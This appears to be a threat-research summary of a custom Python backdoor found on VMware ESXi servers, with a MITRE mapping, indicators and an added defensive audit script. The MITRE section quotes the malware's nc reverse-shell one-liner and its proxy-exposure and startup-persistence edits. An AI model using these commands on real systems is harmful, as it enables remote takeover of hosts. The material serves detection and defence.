A Custom Python Backdoor for VMWare ESXi Servers | Official Juniper Networks Blogs

Juniper Threat Labs uncovered a custom Python backdoor implanted on a VMware ESXi host, persisting by editing startup and proxy configuration and exposing a local webserver that can run commands or establish a reverse shell. The attackers also wired a reverse proxy to allow external access to the malicious service, using a Python-based server named vmtools.py and four modified host/system files to survive reboots. #OpenSLP #CVE-2019-5544 #CVE-2020-3992 #VMwareESXi #JuniperThreatLabs

Keypoints

  • Backdoor implanted on a VMware ESXi virtualization host, linked to OpenSLP vulnerabilities CVE-2019-5544 and CVE-2020-3992.
  • Persistence achieved by modifying four system files (held variously in RAM and on disk) that are processed at or around boot.
  • Python-based backdoor (vmtools.py) begins with a VMware-inspired header and runs a local webserver on 127.0.0.1:8008 to accept password-protected commands or a reverse shell.
  • Attack supports two modes: local command execution and a reverse shell to the attacker’s host/port.
  • External access is enabled by altering the ESXi reverse proxy configuration to expose the malicious service beyond the host (endpoints.conf).
  • Mitigation steps include applying patches, restricting access, and verifying the four modified files for unauthorized changes.

MITRE Techniques

  • [T1190] Exploit Public-Facing Application – The attacker gained access via ESXi OpenSLP vulnerabilities; “ongoing in-the-wild attacks based on two vulnerabilities in the ESXi’s OpenSLP service: CVE-2019-5544 and CVE-2020-3992.”
  • [T1059.006] Python – The Python backdoor runs a Python-based webserver that can execute remote commands or initiate a reverse shell; “The Python script launches a simple webserver that accepts password-protected POST requests and can be used in two ways: it can run arbitrary remote commands and display the results as a webpage, or it can launch a reverse shell to the host and port of the attacker’s choice.”
  • [T1059.004] Unix Shell – The backdoor uses /bin/sh to spawn a reverse shell when requested; “cmd = 'mkfifo /tmp/tmpy_8th_nb; cat /tmp/tmpy_8th_nb | /bin/sh -i 2>&1 | nc %s %s > /tmp/tmpy_8th_nb' % (host, port)”
  • [T1547.001] Boot or Logon Initialization Scripts – Persistence via startup script modification; “The first 7 lines prepend, in a convoluted fashion, a single line of code to /bin/hostd-probe.sh, a system file that is executed automatically when the system boots.”
  • [T1090] Proxy – External access modification via a reverse proxy; “The attackers appended the following line to endpoints.conf, allowing external access to the malicious webserver: / local 8008 allow allow.”
  • [T1036] Masquerading – File naming/location chosen to raise little suspicion; “The name of the file and its location, /store/packages/vmtools.py, was chosen to raise little suspicion on a virtualization host.”

Indicators of Compromise

  • [File] Boot/startup persistence – /etc/rc.local.d/local.sh, /bin/hostd-probe.sh, and 2 more files (and 1 more hashed item, redacted)
  • [File] Python backdoor script – /store/packages/vmtools.py
  • [File] Proxy/configuration – /etc/vmware/rhttpproxy/endpoints.conf
  • [Network] Local binding for backdoor webserver – 127.0.0.1:8008
  • [Network] OpenSLP service port – 427 (the service's default port)
  • [Network] External exposure line in endpoints.conf – “/ local 8008 allow allow”
  • [Vulnerability] CVEs exploited – CVE-2019-5544, CVE-2020-3992
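The mitigation keypoint and the indicator list above can be turned into a host check. The following is an added example written for this summary, not code from Juniper Threat Labs or the post: it audits a snapshot of the named ESXi files for the three indicator types the post describes (the backdoor script path, the endpoints.conf exposure line, and startup files that reference the script) and compares each file against a known-good SHA-256 baseline. The sample file contents, the placeholder endpoints.conf line and the startup-file token pattern are constructed assumptions; the two further modified files and the hash are redacted in the summary and so are not covered.

```python
"""
Added audit example (not from the Juniper post). Checks an in-memory
snapshot of ESXi host files for the indicators the post lists and
reports drift from a known-good baseline. Runs offline on constructed
sample data; on a real host you would read the listed paths instead.
"""
import hashlib
import re
from typing import Dict, List, Optional

# Paths named in the post's indicator list.
STARTUP_FILES = ["/etc/rc.local.d/local.sh", "/bin/hostd-probe.sh"]
BACKDOOR_PATH = "/store/packages/vmtools.py"
PROXY_CONF = "/etc/vmware/rhttpproxy/endpoints.conf"

# Exposure rule quoted in the post: "/ local 8008 allow allow".
PROXY_LINE = re.compile(r"^\s*/\s+local\s+8008\s+allow\s+allow\s*$", re.M)
# Assumption: a prepended startup line references the script path or a
# python interpreter; the post does not show the exact line.
STARTUP_TOKENS = re.compile(r"/store/packages/vmtools\.py|\bpython\b")

Snapshot = Dict[str, Optional[str]]  # path -> content, None if absent


def audit(files: Snapshot) -> List[str]:
    """Return human-readable findings for the indicators in the post."""
    findings: List[str] = []
    if files.get(BACKDOOR_PATH) is not None:
        findings.append(f"backdoor script present: {BACKDOOR_PATH}")
    if PROXY_LINE.search(files.get(PROXY_CONF) or ""):
        findings.append(f"external exposure rule for port 8008 in {PROXY_CONF}")
    for path in STARTUP_FILES:
        if STARTUP_TOKENS.search(files.get(path) or ""):
            findings.append(f"startup file references backdoor: {path}")
    return findings


def make_baseline(files: Snapshot) -> Dict[str, Optional[str]]:
    """SHA-256 per path from a known-good snapshot (None for absent files)."""
    return {
        path: (hashlib.sha256(content.encode()).hexdigest()
               if content is not None else None)
        for path, content in files.items()
    }


def baseline_drift(files: Snapshot, baseline: Dict[str, Optional[str]]) -> List[str]:
    """Paths whose current digest differs from the baseline (added files included)."""
    current = make_baseline({p: files.get(p) for p in baseline})
    return [p for p in baseline if current[p] != baseline[p]]


# Constructed sample snapshots (not real ESXi file contents).
SAMPLE_CLEAN: Snapshot = {
    "/etc/rc.local.d/local.sh": "#!/bin/sh\nexit 0\n",
    "/bin/hostd-probe.sh": "#!/bin/sh\n# constructed probe stub\n",
    PROXY_CONF: "/placeholder local 9999 allow allow\n",
    BACKDOOR_PATH: None,
}
SAMPLE_COMPROMISED: Snapshot = {
    "/etc/rc.local.d/local.sh": "#!/bin/sh\nexit 0\n",
    "/bin/hostd-probe.sh": (
        "python /store/packages/vmtools.py  # constructed sample line\n"
        "#!/bin/sh\n# constructed probe stub\n"
    ),
    PROXY_CONF: "/placeholder local 9999 allow allow\n/ local 8008 allow allow\n",
    BACKDOOR_PATH: "# constructed placeholder for a script body\n",
}

if __name__ == "__main__":
    base = make_baseline(SAMPLE_CLEAN)
    for finding in audit(SAMPLE_COMPROMISED):
        print("finding:", finding)
    for path in baseline_drift(SAMPLE_COMPROMISED, base):
        print("drift:", path)
```

The baseline comparison is the part worth keeping on a real host: record digests of the four files from a known-good image, then re-run the check after patching and on a schedule, since the indicator patterns only catch this specific variant while a digest mismatch catches any unauthorized edit.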

Read more: https://blogs.juniper.net/en-us/threat-research/a-custom-python-backdoor-for-vmware-esxi-servers